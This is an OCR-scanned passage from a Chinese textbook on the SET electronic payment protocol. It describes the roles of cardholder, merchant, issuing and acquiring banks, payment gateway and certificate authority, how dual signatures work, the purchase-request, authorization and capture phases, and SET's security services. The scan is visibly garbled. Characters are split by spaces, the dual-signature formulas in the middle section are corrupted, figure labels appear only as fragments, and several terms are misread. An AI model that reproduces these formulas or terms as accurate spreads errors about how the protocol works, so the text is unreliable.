包 (Electronic Wallet) 。 同 时 , 持 卡 人 必须 先 向 认证 中 心 注册 登记 ,并 取得 数字 证 书 ,然后 才 
能 使 用 基于 SET 协议 的 支付 手段 来 购物 。 在 持 卡 人 和 商家 的 会 话 中 ,SET 可 以 保证 持 卡 
人 的 个 人 账号 不 被 泄露 。 


2. 特约 商店 (Merchant) 


特约 商店 (简称 商家 ) 可 能 是 某 一 个 人 ,或 者 是 某 一 个 组 织 ,通过 网 上 商店 或 者 是 电子 邮 
件 的 方式 ,销售 货物 或 者 是 提供 服务 给 持 卡 人 ,是 SET 交易 的 另 一 方 。 商 家 的 网 上 商店 必 
须 集成 SET 交易 的 商家 软件 , 持 卡 人 在 网 上 购物 时 ,由 网 上 商店 提供 服务 ,购物 结束 进行 支 
付 时 ,由 SET 交易 商家 软件 进行 支付 结算 。 与 持 卡 人 一 样 商家 也 必须 先 到 银行 进行 申请 ， 
但 不 是 到 发 卡 银行 ,而 是 和 接受 网 上 支付 业务 的 信用 卡 收 单 银行 建立 关系 ,在 该 银行 设立 账 
户 , 才 可 以 接受 信用 卡 。 在 开始 交易 前 ,还 必须 到 认证 中 心 申请 数字 证 书 。 


3. 发 卡 银行 (lssuer) 


发 卡 银行 是 一 个 金融 机 构 ,是 发 行 信用 卡 的 银行 ,服务 的 主要 对 象 是 持 卡 人 。 其 主要 职 
能 是 向 持 卡 人 发 行 各 种 银行 卡 , 并 通过 提供 各 类 相关 的 银行 卡 服务 收取 一 定 费 用 。 通 过 发 
行 银行 卡 ,发 卡 机 构 获 得 持 卡 人 支付 的 信用 卡 年 费 、 透 支 利 息 、 持 卡 人 享受 各 种 服务 支付 的 
手续 费 、 商 户 回 佣 分 成 等 。 


4. 收 单 银行 (Acquirer) 


收 单 银 行 也 是 一 个 金融 机 构 ,在 这 里 会 建立 一 个 特约 商店 的 账户 ,这 里 对 信用 卡 做 认证 
处 理 与 账 款 的 处 理 。 特 约 商店 通常 会 接受 几 个 不 同 发 卡 公 司 , 但 不 会 同时 和 多 个 不 同 的 银 
行 卡 协会 或 多 个 个 体 发 卡 银行 合作 。 收 单 银 行 会 协助 特约 商店 做 认证 ,核对 信用 卡 账户 是 
否 有 效 , 以 及 消费 金额 是 否 超出 信用 额度 。 收 单 银行 也 提供 电子 转账 的 服务 , 它 会 将 消费 者 
支付 转 到 特约 商店 的 账户 去 。 接 着 ,发 卡 银行 会 经 过 某 种 付费 网 络 ,对 收 单 银行 补偿 其 协助 
电子 资金 转换 所 需 的 费用 。 收 单 银行 的 利益 主要 来 源 于 商户 回 佣 、 商 户 支 付 的 其 他 服务 费 
(如 POS 终端 租用 费 .月 费 等 ) 及 商户 存款 增加 。 大 多 数 发 卡 银行 都 兼 营 收 单 业务 ,也 有 一 
些 非 银行 专业 服务 机 构 经 营 收 单 业务 。 


5. 支付 网 关 (Payment Gateway) 


支付 网 关 是 连接 银行 专用 网 络 与 Internet 的 一 组 服务 器 ,其 主要 作用 是 完成 两 者 之 间 
的 通信 ,协议 转换 和 进行 数据 加 、 解 密 , 以 保护 银行 内 部 网 络 的 安全 。 支 付 网 关 的 功能 主要 
有 : 将 Internet 传 来 的 数据 包 解 密 , 并 按照 银行 系统 内 部 的 通信 协议 将 数据 重新 打包 ; 接收 
银行 系统 内 部 反馈 的 响应 消息 ,将 数据 转换 为 Internet 传送 的 数据 格式 ,并 对 其 进行 加 密 。 

支付 网 关 由 收 单 银 行 或 特定 的 第 三 者 来 操作 ,处 理 特 约 商 店 支 付 交 易 的 信息 。 支 付 网 
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关 介 于 SET 和 现 有 的 信用 卡 支付 网 络 之 间 ,负责 认证 和 支付 功能 。 特 约 商店 与 支付 网 关 在 
网 络 上 交换 SET 信息 ,而 支付 网 关 则 通过 直接 连接 或 者 是 网 络 联机 ,与 收 单 银 行 的 金融 处 
理 系统 相连 接 。 


6. 认证 中 心 (CA) 


认证 中 心 是 电子 商务 体系 中 的 核心 环节 ,是 电子 交易 中 信赖 的 基础 。 它 通过 自身 的 注 
册 审 核 体系 ,检查 核实 进行 证 书 申请 的 用 户 身 份 和 各 项 相关 信息 ,使 网 上 交易 的 用 户 属性 客 
观 真实 性 与 证 书 的 真实 性 一 致 。 认 证 中 心 作为 权威 的 .可 信赖 的 .公正 的 第 三 方 机 构 ,专门 
负责 发 放 并 管理 所 有 参与 网 上 交易 的 实体 所 需 的 数字 证 书 。 认 证 中 心 用 X. 509 v3 公开 密 
钥 , 对 持 卡 人 、 特 约 商店 ,支付 网 关 做 认证 。 因 为 CA 的 架构 提供 认证 的 功能 ,所 以 SET 才 
有 办 法 通过 CA 来 达到 安全 交易 的 目的 。 

CA 虽然 不 直接 参与 SET 交易 ,但 在 SET 交易 中 起 着 非常 重要 的 作用 。 为 了 保证 
SET 交易 的 安全 ,SET 协议 规定 参加 交易 的 各 方 都 必须 持 有 证 书 , 在 交易 过 程 中 ,每 次 交换 
信息 都 必须 向 对 方 出 示 自 己 的 证 书 ,同时 要 验证 对 方 的 证 书 。CA 的 工作 就 是 交易 各 方 证 
书 的 发 放 、 更 新 、 废 除 ,建立 证 书 黑 名 单 等 各 种 证 书 管理 。 参 与 交易 的 各 方 在 交易 前 必须 到 
CA 申请 证 书 , 在 证 书 到 期 时 ,必须 进行 证 书 的 更 新 。 

下 面 简单 介绍 一 下 , 当 进 行 一 个 交易 时 ,需要 哪些 事件 来 完成 安全 性 的 电子 交易 。 

(1) 消费 者 开 立 账户 。 首 先 消费 者 要 在 有 支持 电子 支付 及 SET 的 银行 建立 信用 卡 账 
户 ,比如 MasterCard 或 Visa 。 

(2) 消费 者 收 到 证 书 。 在 适当 的 身份 确认 过 程 之 后 ,消费 者 会 收 到 由 银行 签署 的 
X. 509 v3 数字 证 书 。 这 个 证 书 用 来 核对 消费 者 的 RSA 公 钥 及 其 有 效 期 限 。 同 时 ,也 建立 
了 消费 者 的 密 钥 组 与 信用 卡 之 间 的 关系 ,并 由 银行 来 保证 这 个 关系 。 

(3) 特约 商店 证 书 。 接 受 某 家 公司 的 信用 卡 的 特约 商店 必须 拥有 两 个 证 书 , 分 别 包含 
一 把 公 钥 。 一 个 用 来 签署 信息 ,一 个 是 用 在 密 钥 交换 。 特 约 商店 也 要 保留 一 份 支付 网 关 的 
公 钥 证 书 。 

(4) 消费 者 订购 。 这 个 动作 可 能 会 牵涉 到 消费 者 第 一 次 浏览 特约 商店 的 网 站 ,并 且 选 
择 商 品 ,决定 价格 。 然 后 消费 者 会 将 这 次 欲 购买 商品 的 订购 单 发 送 给 特约 商店 ,接着 特约 商 
店 会 传 回 商品 列表 、 价 格 .总 价 和 一 个 订单 编号 。 

(5) 特约 商店 核对 。 除 了 订购 单 , 特 约 商店 会 发 送 它们 的 证 书 副本 ,而 消费 者 可 以 核对 
所 消费 的 商店 是 否 为 合法 有 效 的 。 

(6) 发 送 订单 及 支付 。 消 费 者 将 其 订单 .支付 命令 与 其 证 书 传送 给 特约 商店 。 这 份 订 
单 对 所 支付 的 款项 进行 核对 。 支 付 中 会 包含 了 信用 卡 的 细节 。 因 此 支付 的 信息 要 经 过 加 
密 , 才 不 会 被 特约 商店 获取 其 中 的 重要 信息 。 而 消费 者 的 证 书 可 以 让 特约 商店 核对 消费 者 
身份 。 

(7) 特约 商店 请 求 支付 认证 。 特 约 商店 在 这 个 时 候 会 向 支付 网 关 传送 支付 命令 ,并 且 
请 求 核 对 消费 者 的 信用 卡 是 否 能 支付 这 笔 款项 。 

(8) 特约 商店 核准 订单 。 特 约 商 店 将 核准 的 订单 信息 传送 给 消费 者 。 

(9) 特约 商店 提供 其 货物 或 服务 。 将 消费 者 订购 的 商品 装运 ,或 提供 给 消费 者 其 他 
服务 。 
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(10) 特约 商店 请 求 支付 。 商 店 将 请 求 支付 的 消息 送 到 支付 网 关 , 支 付 网 关 会 处 理 支付 
工作 


134.3 双重 签名 


双重 签名 是 SET 推出 的 数字 签名 的 新 应 用 。 

双重 签名 的 目的 在 连接 两 个 不 同 接收 者 消息 。 在 这 里 ,消费 者 想 要 发 送 订 单 信息 
(Order Information,OD 到 特约 商店 , 且 发 送 支 付 命令 (Payment Instruction,PI) 给 银行 。 
特约 商店 并 不 需要 知道 消费 者 的 信用 卡 卡号 ,而 银行 不 需要 知道 消费 者 订单 的 详细 信息 。 
消费 者 需要 将 这 两 个 消息 分 隔 开 ,而 受到 额外 的 隐私 保护 。 然 而 ,在 必要 的 时 候 这 两 个 消息 
必须 要 连接 在 一 起 , 才 可 以 解决 可 能 的 争议 .质疑 。 这样 消费 者 可 以 证 明 这 个 支付 行为 是 根 
据 他 的 订单 来 执行 的 ,而 不 是 其 他 的 货品 或 服务 。 

为 了 理解 这 个 连接 的 需要 性 , 先 假设 消费 者 发 送 两 个 消息 给 特约 商店 : 签名 过 的 OI 及 
PI, 而 特约 商店 将 PI 的 部 分 传递 给 银行 。 如 果 这 个 特约 商店 能 获得 这 个 消费 者 的 其 他 OI， 
那么 特约 商店 就 可 以 声称 后 来 的 这 个 OI 是 和 PI 一 起 来 的 ,而 不 是 原来 的 那个 OI。 因 此 如 
果 将 两 个 消息 连接 起 来 ,就 可 以 避免 这 种 情况 发 生 。 

消费 者 用 SHA-1 算法 ,取得 PI 的 Hash 值 和 OI 的 Hash 值 。 接 着 将 这 两 个 Hash 值 
连接 在 一 起 ,并 用 消费 者 的 私 钥 来 加 密 ,就 产生 了 双重 签名 。 这 个 过 程 可 以 用 下 面 的 式 子 
表示 


DS=Ex, [LHCHCPD | H(OD)] 
其 中 ,Ex 是 表示 消费 者 的 私 钥 。 现 在 假设 特约 商店 拥有 这 个 双重 签名 (DS) .OIL 和 PI 的 消 
息 摘要 (PIMD)。 并 且 特 约 商 店 也 从 消费 者 的 证 书 中 得 到 消费 者 的 公 钥 。 
接着 ,特约 商店 就 能 计算 出 两 个 数 , 如 下 面 所 述 
五 (PIMD | H(OD) 
Dru [LDS] 
其 中 ,Dk 为 消费 者 的 公 钥 。 如 果 这 两 个 数 计算 出 的 结果 相同 , 则 特约 商店 就 可 核准 这 个 签 
名 。 相 同 地 ,如 果 银 行 拥有 DS、PI 和 OI 的 消息 摘要 (OIMD) ,以 及 消费 者 的 公 钥 , 则 银行 可 
计算 如 下 
H(H(PD || OIMD) 
Dru LDS] 
如 果 两 个 数 计算 出 来 都 一 样 ,银行 就 核准 这 个 签名 。 总 结 如 下 。 
(1) 特约 商店 接收 到 OI, 可 以 验证 签名 确认 OI 正确 性 。 
(2) 银行 接收 到 PI, 也 可 验证 此 签名 确认 PI 的 正确 性 。 
(3) 消费 者 则 将 OI 及 PI 连接 完成 ,并 且 可 以 证 明 这 个 连接 的 正确 性 。 
举例 来 说 , 王 先 生 要 买 李 小 姐 的 一 处 房产 ,他 发 给 李 小 姐 一 个 购买 报价 单 及 对 他 对 银行 
的 授权 书 的 消息 ,要 求 银行 如 果 李 小 姐 同意 按 此 价格 出 卖 , 则 将 钱 划 到 李 小 姐 的 账 上 。 但 是 
王 先生 不 想 让 银行 看 到 报价 ,也 不 想 让 李 小 姐 看 到 他 的 银行 账号 信息 。 此 外 ,报价 和 支付 是 
相连 的 不 可 分 割 的 , 仅 当 李 小 姐 同 意 他 的 报价 , 钱 才 会 转移 。 要 达到 这 个 要 求 , 采 用 双重 签 
名 即 可 实现 。 首 先生 成 两 条 消息 的 摘要 ,将 两 个 摘要 连接 起 来 ,生成 一 个 新 的 摘要 ( 称 为 双 
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重 签名 ) ,然后 用 签发 者 的 私有 密 钥 加 密 , 为 了 让 接收 者 验证 双重 签名 ,还 必须 将 另外 一 条 消 
息 的 摘要 一 块 传 过 去 。 这 样 ,任何 一 个 消息 的 接收 者 都 可 以 通过 以 下 方法 验证 消息 的 真实 
性 : 生成 消息 摘要 ,将 它 和 另外 一 个 消息 摘要 连接 起 来 ,生成 新 的 摘要 ,如 果 它 与 解密 后 的 
双重 签名 相等 ,就 可 以 确定 消息 是 真实 的 。 因 此 ,如 果 李 小 姐 同意 , 它 发 一 个 消息 给 银行 表 
示 她 同意 ,另外 包括 报价 单 的 消息 摘要 ,银行 能 验证 王 先生 授权 的 真实 性 ,用 王 先生 的 授权 
书生 成 的 摘要 和 李 小 姐 消息 中 的 报价 单 的 摘要 验证 双重 签名 。 银 行 根据 双重 签名 可 以 判定 
报价 单 的 真实 性 ,但 却 看 不 到 报价 单 的 内 容 。 
在 图 13-15 中 描述 了 使 用 双重 签名 来 实现 这 一 需求 的 过 程 。 


Kpe 


Dual 


POMD | signature 
-~ 区 一 -~ 区 到 


PI: 支付 命令 PIMD: PI 消息 摘要 
OIL: 订单 信息 OIMD: OI 消息 摘要 
H: 哈 希 函数 (SHA-1) 。 POMD: 支付 /订单 消息 摘要 
l: 连接 E: 加 密 函 数 (RSA) 
Kre: 用 户 私 钥 


图 13-15 双重 签名 的 生成 过 程 


1344 SET 的 交易 流程 


电子 购物 的 工作 流程 与 现实 购物 的 流程 很 相似 ,这 使 得 电子 商务 与 传统 商务 可 以 很 好 
地 融合 ,用 户 使 用 起 来 也 没有 什么 障碍 。 从 顾客 通过 浏览 器 进入 在 线 商店 开始 ,一 直到 账户 
上 的 金额 被 划 走 ,所 有 这 些 都 是 通过 Internet 完成 的 。 

通常 ,一 个 SET 交易 过 程 会 涉及 以 下 事件 或 状态 。 

(1) 持 卡 人 注册 (Cardholder Registration) : 持 卡 人 必须 在 发 送 SET 信息 给 特约 商店 
之 前 向 CA 注册 。 

(2) 特约 商店 注册 (Merchant Registration) : 特约 商店 必须 在 它们 和 消费 者 与 支付 网 
关 交 换 SET 信息 之 前 ,向 CA 申请 注册 。 

(3) 购买 请 求 (Purchase Request): 从 消费 者 送出 给 特约 商店 的 消息 ,包含 给 特约 商店 
的 OI 与 给 银行 的 PI。 

(4) 支付 授权 (Payment Authorization) : 在 特约 商店 与 支付 网 关 之 间 的 交换 ,可 以 对 特 
定 账 户 信 用 卡 持 卡 人 的 采购 做 授权 。 

(5) 支付 请 款 (Payment Capture) : 让 特约 商店 可 以 从 支付 网 关 请 求 支付 项 。 

(6) 证 书 询 问 与 状态 (Certificate Inquiry and Status) : 如 果 CA 无 法 快速 完成 一 个 证 书 
请 求 的 处 理 , 它 会 发 送 一 个 消息 给 持 卡 人 或 特约 商店 ,表明 要 请 求 者 稍 后 再 做 确认 。 而 持 卡 
人 或 特约 商店 会 发 送 证 书 询问 的 消息 ,来 确定 证 书 请 求 的 状态 ,如 果 请 求 得 到 批准 就 会 接收 
到 证 书 了 。 
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(7) 采购 询问 (Purchase Inquiry): 采购 响应 消息 收 到 后 , 持 卡 人 可 以 询问 订单 处 理 

(8) 请 款 撤销 (Capture Reversal) : 特约 商店 可 以 更 正在 取得 请 求 消息 中 的 错误 ,如 销 
售 员 输 入 错误 的 交易 数量 。 

前 面 已 经 提 到 ,SET 交易 分 为 三 个 阶段 , 即 购买 请 求 阶段 .支付 授权 阶段 和 取得 支付 阶 
段 ,下 面 对 这 三 个 阶段 做 详细 介绍 。 


1. 第 一 阶段 : 购买 请 求 


在 购买 请 求 之 前 , 持 卡 人 已 经 完成 浏览 选 定 商品 以 及 订购 的 工作 。 这 些 工 作 都 还 没有 
使 用 到 SET 协议 。 

购买 请 求 过 程 由 四 个 消息 构成 : 初始 请 求 ,初始 回应 、 购 买 请 求 、 购 买 回应 。 

为 了 传送 SET 消息 到 特约 商店 , 持 卡 人 必须 要 保留 一 份 特约 商店 及 支付 网 关 的 证 书 副 
本 。 消 费 者 在 初始 请 求 的 消息 中 要 求 申请 证 书 ,然后 这 个 消息 会 送 到 特约 商店 。 这 个 消息 
包括 消费 者 所 使 用 的 信用 卡 的 公司 ,也 包含 了 由 消费 者 指定 的 回应 这 组 请 求 的 一 个 ID。 

特约 商店 对 这 个 请 求 产 生 响 应 ,并 且 用 自己 的 私 钥 来 签名 。 这 个 响应 消息 包含 一 个 代 
表 这 次 购买 交易 代号 的 ID、 特 约 商 店 的 签名 证 书 及 支付 网 关 证 书 。 持 卡 人 会 对 特约 商店 和 
支付 网 关 证 书 , 用 它们 各 自 的 CA 签名 来 做 核对 的 工作 ,然后 产生 OI 及 PI。 由 特约 商店 所 
指定 的 交易 ID 会 放 在 OI 及 PI 中。 在 OI 里 并 不 会 包含 明确 的 订单 数据 ,比如 物品 的 编号 
或 规格 。 接 着 , 持 卡 人 产生 一 个 暂时 的 对 称 加 密 密 钥 K, ,准备 好 购买 请 求 (Purchase 
Request) 消 息 ,如 图 13-16 所 示 。 


Request message 


四 

Dual 

er 由 商家 发 给 支付 网 关 

Se 

OIMD 

由 商家 接收 
PI: 支付 命令 
OIL: 订单 信息 
PIMD : PI 消息 摘要 
OIMD : OI 消息 摘要 
E: 加 密 函 数 (RSA 或 DES) 
到 : 临时 对 称 密 钥 
人 Kum: 银行 的 公 钥 
图 13-16 持 卡 人 发 送 采购 请 求 
这 个 消息 包含 了 以 下 信息 。 


(1) 采购 相关 的 信息 。 这 个 信息 会 由 特约 商店 转送 到 支付 网 关 。 由 以 下 成 分 组 成 。 
a 支付 命令 PI。 
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@ 由 了 PI 与 OI 所 计算 出 并 且 经 过 消费 者 私 钥 签署 的 双重 签名 。 

@ OI 消息 摘要 (OIMD)。 在 支付 网 关中 需要 OIMD 来 确认 双重 签名 ,如 同 前 面 介绍 
的 。 所 有 的 东西 需要 经 过 K, 加 密 。 

@ 数字 信封 。 这 个 信封 是 由 支付 网 关 的 密 钥 K, 所 产生 的 。 之 所 以 被 称 为 数字 信封 ， 
是 因为 只 有 能 够 打开 信封 的 人 ,才能 够 读 取 上 述 内 容 。 开 , 的 值 是 不 对 特约 商店 公开 的 , 因 
此 ,特约 商店 无 法 获得 任何 这 个 支付 相关 的 信息 。 

(2) 订单 相关 信息 。 特 约 商 店 需要 这 项 信息 , 它 包括 : 

Q@ 订单 信息 OIL。 

@ 由 PI 与 OI 计算 出 并 经 消费 者 的 私 钥 签 署 的 双重 签名 。 

@ PI 消息 摘要 (PIMD)。 

特约 商店 需要 PIMD 来 对 双重 签名 做 确认 。 请 注意 OI 是 以 没有 加 密 保护 的 明文 方式 
传送 出 去 的 。 

(3) 持 卡 人 证 书 。 这 部 分 包含 持 卡 人 公开 签名 密 钥 。 对 特约 商店 与 支付 网 关 来 说 , 它 
们 都 需要 这 个 证 书 。 

当 特 约 商 店 接收 到 购买 请 求 消息 , 它 会 做 以 下 动作 (如 图 13-17 所 示 ) 。 


Request message 


OIL: 订单 信息 
OIMD : OI 消息 摘要 
POMD : 支付 /订单 消息 摘要 
由 商家 发 给 。 了 : 解密 (RSA) 
支付 网 关 及: 哈 希 函数 (SHA-1) 
Ku,: 用 户 公 钥 
PIMD POMD 
Dp 
[oj 本 核对 
OIMD 
人 | 站 
Cardholder POMD 
certificate 
Ku. 


图 13-17 商家 核对 消费 者 的 采购 请 求 


(1) 以 CA 签名 核对 持 卡 人 的 证 书 。 

(2) 利用 消费 者 公开 签名 密 钥 对 双重 签名 做 核对 。 这 样 可 以 确保 订单 在 传送 过 程 中 没 
有 被 算 改 ,并 且 可 以 确定 这 是 经 过 持 卡 人 的 私 钥 签 署 过 的 合法 订单 。 

(3) 对 订单 做 处 理 , 并 且 将 支付 信息 传送 给 支付 网 关 。 

购买 响应 消息 包含 了 一 个 响应 区 块 ,用 来 告知 收 到 订单 ,并 顺便 取得 相对 应 的 交易 代 
码 。 特 约 商 店 以 它 的 私 钥 来 签署 这 个 区 块 。 然 后 此 区 块 及 签名 会 和 特约 商店 的 签名 证 书 一 
起 传送 到 消费 者 那里 。 

当 持 卡 人 软件 接收 到 购买 响应 消息 后 ,他 会 核对 特约 商店 的 证 书 , 然 后 再 核对 响应 区 块 
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中 的 签名 。 最 后 ,显示 给 使 用 者 一 个 消息 或 更 新 数据 库 上 订单 的 数据 。 
2. 第 二 阶段 : 支付 授权 


在 处 理 一 个 持 卡 人 订单 的 过 程 中 ,特约 商店 会 授权 支付 网 关 来 处 理 此 次 交易 。 这 样 的 
支付 权 可 以 确保 进行 中 的 交易 是 经 由 发 行人 认可 过 的 。 并 且 , 这 个 授权 可 以 确保 特约 商店 
一 定 会 接收 到 支付 ,进而 特约 商店 才 愿意 提供 服务 或 商品 给 消费 者 。 支 付 授权 过 程 中 包含 
了 授权 请 求 和 授权 回应 消息 。 

授权 请 求 消息 ,由 特约 商店 发 送 给 支付 网 关 , 包 含 了 下 列 信 息 。 

(1) 采购 的 相关 消息 。 这 个 消息 是 从 消费 者 那里 得 来 的 ,组 成 的 成 分 有 : 

DP 

@ 由 PI 与 OI 所 计算 出 ,并 且 经 由 消费 者 私 钥 签 署 过 的 双重 签名 。 

@ OI 消息 摘要 。 

@ 数字 信封 。 

(2) 授权 的 相关 消息 。 这 个 消息 是 由 特约 商店 所 产生 的 , 它 包 含 了 以 下 的 组 成 成 分 ; 

@ 授权 区 块 ,包含 了 交易 ID, 由 特约 商店 私 钥 签署 ,并 经 特约 商店 所 产生 的 临时 对 称 
密 钥 加 密 。 

@ 数字 信封 。 

(3) 证 书 。 包 含 持 卡 人 的 签名 密 钥 证 书 ( 用 来 对 双重 签名 进行 核对 ) ,特约 商店 的 签名 
密 钥 证 书 (用 来 对 特约 商店 的 签名 进行 核对 ) ,以 及 特约 商店 的 密 钥 交换 证 书 (在 支付 网 关 响 
应 时 会 用 到 ) 。 

而 支付 网 关 则 需要 执行 以 下 工作 。 

(1) 核对 所 有 的 证 书 。 

(2) 将 授权 区 块 的 数字 信封 解密 ,得 到 对 称 密 钥 ,然后 就 可 以 对 授权 区 块 解密 了 。 

(3) 核对 授权 区 块 中 的 特约 商店 签名 。 

(4) 对 支付 区 块 的 数字 信封 解密 ,得 到 对 称 密 钥 后 ,可 以 再 将 支付 区 块 解密 。 

(5) 核对 支付 区 块 中 的 双重 签名 。 

(6) 核对 从 特约 商店 接收 到 的 交易 ID, 是 否 和 从 消费 者 接收 到 的 PI 内 交易 ID 吻合 。 

(7) 向 发 卡 银行 请 求 并 接受 授权 。 

得 到 发 卡 银行 的 授权 之 后 ,支付 网 关 会 传 回 一 个 授权 响应 (Authorization Response) 消 
息 给 特约 商店 。 其 中 包含 了 以 下 的 成 分 。 

(1) 授权 相关 的 信息 。 包 含 授权 区 块 , 用 网 关 的 私 钥 签 署 过 ,并 且 用 网 关 产生 的 暂时 对 
称 钥 加 密 。 另 外 也 包含 了 一 个 数字 信封 ,内 涵 用 特约 商店 的 公 钥 加 密 过 的 暂时 密 钥 。 

(2) 记录 信封 的 信息 。 这 项 信息 会 在 后 面 用 来 完成 支付 的 任务 。 

(3) 证 书 。 支 付 网 关 的 签名 密 钥 证 书 。 

经 过 支付 网 关 认 可 后 ,特约 商店 便 可 以 提供 商品 或 服务 给 消费 者 。 


3. 第 三 阶段 : 取得 支付 


为 了 得 到 消费 者 的 付费 款项 ,特约 商店 必须 和 支付 网 关 进 行 支付 信息 的 交换 处 理 , 这 项 
交易 过 程 中 包含 了 两 个 消息 ,分 别 是 记录 请 求 消息 与 记录 响应 消息 。 
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在 记录 请 求 消息 中 ,特约 商店 会 产生 一 个 记录 请 求 区 块 , 并 对 其 做 签名 并 且 加 密 。 这 个 
区 块 包 含 了 支付 信息 与 交易 ID。 在 这 个 消息 中 ,也 包含 了 这 次 交易 先前 (在 授权 回应 时 ) 收 
到 的 加 密 过 的 记录 信封 ,还 有 特约 商店 的 签名 密 钥 及 证 书 。 

当 支 付 网 关 接 收 到 记录 请 求 消息 时 ,会 解 译 并 且 核 对 记录 请 求 区 块 及 记录 信封 区 块 。 
然后 确认 记录 请 求 与 记录 信封 之 间 的 一 致 性 。 接 着 产生 一 个 请 求 消息 ,通过 支付 网 络 送 给 
发 卡 银行 。 这 个 消息 会 使 支付 的 资金 传送 到 特约 商店 的 账户 中 。 

支付 网 关 接 着 会 以 记录 响应 消息 通知 特约 商店 已 进行 转账 动作 。 这 个 消息 包括 了 一 个 
经 过 支付 网 关 签署 并 且 加 密 的 记录 响应 区 块 。 另 外 还 有 了 网关 的 签名 密 钥 证 书 。 而 特约 商店 
软件 会 储存 这 个 记录 响应 ,用 来 保持 与 收音 银行 所 收 到 的 支付 项 的 一 致 性 。 
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在 ISO/IEC 10181 系列 中 阐述 了 开放 式 信 息 系统 的 安全 架构 标准 , 共 包 含 七 个 部 分 : 
认证 ,访问 控制 , 抗 否认 性 ,机 密 性 、 完 整 性 ,安全 跟踪 与 告警 以 及 密 钥 管 理 等 服务 ,其 中 访问 
控制 及 安全 跟踪 告警 两 部 分 牵涉 到 企业 安全 政策 与 组 织 架构 的 程度 较 深 ,SET 并 没有 针对 
它们 给 应 用 系统 开发 人 员 提 出 系统 的 指导 原则 ; 另外 ,关于 密 钥 管理 的 部 分 ,SET 协议 也 没 
有 说 明 该 如 何 处 理 , 也 就 是 说 ,目前 SET 将 上 述 三 个 部 分 留 给 应 用 系统 开发 人 员 自 行 处 理 。 

电子 支付 系统 中 的 支付 信息 牵涉 资金 转移 的 有 关 信 息 , 如 用 户 数据 .信用 卡号 码 、 交 易 
内 容 等 个 人 信息 ,系统 必须 要 能 确保 隐私 数据 在 网 络 上 传输 的 安全 性 ,由 此 可 看 出 保护 隐私 
权 对 于 电子 支付 的 重要 性 。ISOVIEC 10181 系列 文件 中 有 关 隐 私 权 保护 的 规范 并 不 完整 ， 
ISO/IEC 10181 一 5 所 论述 的 机 密 性 保护 是 指 通信 的 机 密 性 。 个 人 隐私 权 的 保护 有 较 宽 广 
的 意义 ,应 该 被 列 人 安全 需求 的 考虑 。 

1. 认证 安全 

这 项 服务 主要 是 为 了 验证 交易 参与 者 确实 是 自己 所 声称 的 个 体 。SET 协议 使 用 数字 
签名 与 证 书 的 技术 来 达到 身份 识别 的 目的 ,而 进行 的 方式 为 : 发 送 方 (例如 顾客 ) 使 用 自己 
的 密 钥 将 交易 信息 加 密 而 产生 数字 签名 ,然后 接收 方 (例如 商店 ) 先 使 用 签证 中 心 的 公开 密 
钥 来 检验 对 方 证 书 的 真 伪 ,确定 无 误 后 才 取 出 证 书 中 的 公开 密 钥 ,进行 签名 验证 ,如 此 可 达 
到 身份 认证 的 功能 。 尤 其 ,采用 可 信赖 的 第 三 方 (认证 中 心 ) 来 负责 公 钥 的 签发 工作 ,可 以 使 
得 身份 认证 的 工作 在 开放 的 网 络 环境 里 更 能 够 确保 安全 。 然 而 也 正 因为 如 此 ,SET 的 认证 
工作 必须 依赖 公 钥 的 运作 体系 (PKI) ,使 得 系统 是 否 能 实际 运作 必须 根据 整体 大 环境 是 否 
成 熟 而 定 ,例如 签证 体系 的 建立 等 ,这 将 导致 系统 建设 成 本 的 大 幅 提 升 。 


2. 完整 性 安全 


为 了 确保 交易 数据 在 经 过 网 络 媒介 传输 后 没有 遭 到 修改 ,就 必须 要 检验 收 到 的 数据 是 
不 是 与 原 数据 相同 ,也 就 是 验证 数据 的 完整 性 ; 另外 ,接收 方 也 必须 确定 发 送 方 能 够 对 文件 
负责 , 即 签字 、 盖 章 的 概念 ,也 必须 避免 相同 的 数据 被 重复 使 用 。SET 协议 使 用 数字 签名 与 
哈 希 函数 技术 来 达成 上 述 有 关 完 整 性 的 要 求 , 运 作 方式 为 发 送 方 先 将 交易 信息 经 过 哈 希 函 
数 的 计算 产生 消息 摘要 后 ,再 使 用 发 送 方 的 私 钥 加 密 产 生 签名 。 这 里 将 两 种 技术 结合 使 用 ， 
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可 以 得 到 较 简易 的 算法 、 较 快 的 签名 速度 等 好 处 。SET 使 用 的 喻 希 函 数 算法 是 SHA-1, 其 
产生 的 消息 摘要 长 度 为 160 位 ,而 只 要 更 改 消息 中 任 一 个 位 ,平均 来 说 ,将 导致 一 半 的 消息 
摘要 位 改变 , 故 可 提升 了 签名 的 安全 性 。 再 者 ,每 一 位 SET 使 用 者 持 有 两 对 非 对 称 密 钥 ,分 
别 用 于 密 钥 交换 及 签名 上 ,这 增加 了 系统 破解 的 复杂 度 ,同时 系统 安全 也 相对 提高 。 


3. 机 密 性 安全 


机 密 性 服务 是 指 防止 未 经 授权 的 信息 泄露 行为 。SET 协议 使 用 了 密码 学 技术 来 确保 
交易 信息 的 机 密 性 ,在 信息 交换 的 过 程 里 采用 了 对 称 性 与 非 对 称 性 的 密码 系统 。 

一 般 来 说 ,对 称 性 密码 系统 不 太 适用 于 一 群 素 不 相识 的 人 在 开放 的 网 络 里 交换 信息 , 因 
为 对 一 家 商店 来 说 它 必须 分 别 指定 每 一 顾客 所 需 的 唯一 密 钥 ,并 且 经 过 安全 的 管道 传送 给 
顾客 ,这 种 做 法 在 开放 的 因特网 中 毫 无 效率 可 言 。 同 样 的 情况 ,如 果 使 用 非 对称 性 密码 系 
统 , 则 同一 家 商店 仅 需 要 建立 一 对 公私 钥 并 且 公 布 公 钥 , 如 此 一 来 , 它 允 许 顾客 们 使 用 这 把 
公 钥 将 信息 安全 地 传送 给 商家 ,而 这 就 是 SET 在 进行 信息 交换 时 采用 公 钥 密码 技术 的 原 
因 ; 为 了 提供 更 高 的 安全 保护 ,也 就 是 防止 他 人 根据 算法 或 环境 等 相关 信息 重新 制造 加 密 
密 钥 ,所 以 使 用 了 “数字 信封 "的 加 密 方式 , 即 在 信息 交换 之 前 先 随机 产生 会 话 密 钥 , 用 对 称 
密 钥 将 信息 加 密 , 然 后 再 用 接收 者 的 公 钥 将 这 把 对 称 密 钥 加 密 得 到 数字 信封 ,最 后 才 将 加 密 
后 的 信息 及 数字 信封 传送 给 接收 者 。 

由 于 每 一 次 交易 双方 建立 新 的 连接 就 是 一 次 通信 期 间 的 开始 ,而 每 次 通信 期 间 都 会 产 
生 新 的 通信 密 钥 ,也 就 是 说 每 个 通信 密 钥 的 有 效 期 为 通信 期 间 , 此 期 间 通常 都 不 长 ; 基于 这 
